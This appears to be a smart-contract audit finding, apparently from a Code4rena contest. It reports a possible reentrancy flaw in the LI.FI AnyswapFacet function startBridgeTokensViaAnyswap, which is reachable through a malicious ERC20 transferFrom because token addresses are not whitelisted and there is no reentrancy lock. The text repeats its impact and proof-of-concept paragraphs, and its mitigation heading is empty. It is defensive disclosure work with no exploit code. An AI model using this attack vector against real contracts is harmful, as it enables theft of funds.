Without the whitelist and lock, this contract has potential reentrancy vulnerability.
Proof of Concept
startBridgeTokensViaAnyswap does not perform a whitelist judgment on the token address, and the contract does not have a reentrant lock. At LibAsset.transferFromERC20, an attacker can custom construct a malicious transferFrom function of ERC20 contract to perform a reentrancy attack on the startBridgeTokensViaAnyswap contract.
Lines of code
https://github.com/code-423n4/2022-03-lifinance/blob/main/src/Facets/AnyswapFacet.sol#L35-L66
Vulnerability details
Impact
Without the whitelist and lock, this contract has potential reentrancy vulnerability.
Proof of Concept
startBridgeTokensViaAnyswap does not perform a whitelist judgment on the token address, and the contract does not have a reentrant lock. At LibAsset.transferFromERC20, an attacker can custom construct a malicious transferFrom function of ERC20 contract to perform a reentrancy attack on the startBridgeTokensViaAnyswap contract.
Tools Used
Recommended Mitigation Steps